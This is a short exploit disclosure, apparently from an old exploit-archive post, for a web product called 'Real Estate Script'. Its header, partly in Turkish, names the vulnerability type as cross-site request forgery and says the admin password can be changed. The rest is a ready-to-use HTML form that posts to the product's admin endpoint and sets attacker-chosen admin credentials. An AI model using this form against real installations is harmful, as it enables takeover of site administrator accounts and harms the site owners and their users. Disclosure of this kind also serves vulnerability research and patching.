< ------------------- header data start ------------------- >

#############################################################

# Application Name : Real Estate Script

# vulnerable Type : XSRF

# Infection : Admin pass Change Edilebilir.

# Demo : http://realestatephp.com/demo/

# author : BARCOD3 - Bug Researchers

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

<form name=user_form action=http://realestatephp.com/demo/realestate-admin/realestate.php method=post onSubmit=return verify_form();>
<input type=hidden name=mode value=admin_list>
<input type=hidden name=step value=process>
<input type=text id=email name=email value=[email protected] class=textfield2>
<input type=password id=password name=password value=passWORD class=textfield2>
<input type=password id=retype_password name=retype_password value=RETYPE passWORD class=textfield2>
<input type=submit value=Save class=buttons2>
</form>


< -- bug code end of -- >